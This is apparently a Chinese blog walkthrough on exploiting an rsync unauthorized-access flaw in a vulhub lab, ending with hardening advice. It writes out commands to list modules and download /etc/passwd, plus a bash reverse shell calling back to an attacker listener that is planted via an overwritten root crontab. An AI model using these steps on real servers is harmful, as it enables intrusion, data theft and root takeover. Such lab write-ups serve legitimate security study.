rsync未授权访问漏洞

一、漏洞介绍

  rsync是Linux下一个远程同步工具,可快速同步多台主机中的文件和目录,如果配置不当,导致任何人可未授权访问上传/下载服务器文件。默认端口873

二、漏洞环境

  • vulhub + docker

三、漏洞利用

3.1 漏洞探测

》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口
在这里插入图片描述
》》列出目标服务器目录:(两个方法皆可)
在这里插入图片描述
》》查看目录中的文件,如能查看说明存在未授权访问漏洞
或者

rsync rsync://<ip>:<port>/src

  
  
  • 1

在这里插入图片描述

3.2 漏洞利用(下载任意文件)

》》将对方passwd文档下载到本地
或者使用:

rsync -av rsync://<ip>:<port>/src/etc/passwd /

  
  
  • 1

在这里插入图片描述

3.3 漏洞利用(提权、反弹shell)

3.3.1 方法一

思路:

  1. 写一个bash反弹shell脚本到目标服务器(带着执行权限)
  2. 利用未授权,下载、编辑并上传crontab配置文件,定时运行脚本

Tips:不同的操作系统定时任务文件可能不同

》》本地准备好反弹shell文件,并赋予执行权限

#!/bin/bash 
/bin/bash -i >& /dev/tcp/<listener_ip>/<listener_port> 0>&1

  
  
  • 1
  • 2

在这里插入图片描述
》》将反弹shell文件上传到攻击者目录下
在这里插入图片描述

查看是否上传成功:
在这里插入图片描述

》》下载对方定时任务文件crontab
在这里插入图片描述
》》编辑crontab文件并保存退出(每隔1分钟运行一次脚本)
在这里插入图片描述
》》反弹shell的攻击者监听端口
在这里插入图片描述
》》将crontab文件上传到目标服务器:
在这里插入图片描述
》》攻击者成功获得shell
在这里插入图片描述

3.3.2 方法二

Tips:第二种方法绕了个路,一般使用第一种方法即可,不行的话可以尝试下第二种情况

思路:上传

  1. 写一个bash反弹shell脚本到目标服务器的/etc/cron.hourly目录下(带着执行权限)
  2. 利用未授权,下载、编辑并上传crontab文件

》》将上方的nc_shell.sh更改为nc_shell
》》将nc_shell上传至目标服务器的/etc/cron.hourly 目录下
在这里插入图片描述
》》下载对方的crontab文件编辑如下:(表示每分钟会执行/etc/cron.hourly文件夹下的文件)

*/1 *	* * *	root    cd / && run-parts --report /etc/cron.hourly

  
  
  • 1

在这里插入图片描述
》》上传到victim服务器,覆盖原crontab文件
在这里插入图片描述
》》攻击者监听端口,成功获取到shell
在这里插入图片描述

四、修复建议

更改配置文件/etc/rsyncd.conf,添加或修改参数:

  1. 访问控制,设置host allow,限制访问主机IP;
  2. 权限控制,设置read only=yes,模块设置为只读;
  3. 访问认证,设置auth、secrets,认证成功才能调用服务;
  4. 模块隐藏,设置list,将模块隐藏起来。
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
回答: 目前已经存在一些rsync漏洞,可以被攻击者利用来执行远程代码或者获取敏感信息。其中一种漏洞是在rsync服务端配置文件中,如果配置了"uid"和"gid"为root限,并且没有启用chroot限制,则攻击者可以通过构造恶意的rsync请求来提升限并执行恶意代码。此外,在一些版本的rsync中存在其他漏洞,攻击者可以利用这些漏洞来执行任意命令或者读取敏感文件。要防止漏洞利用,建议及时更新rsync到最新版本,并且配置合适的限限制和访问控制,确保只有合法的用户可以访问rsync服务。另外,也应该定期审查rsync日志,以及监控系统中的异常行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [rsync 授权访问漏洞](https://blog.csdn.net/weixin_59086772/article/details/122195357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [漏洞利用——Rsync匿名访问漏洞](https://blog.csdn.net/qq_33608000/article/details/104124375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值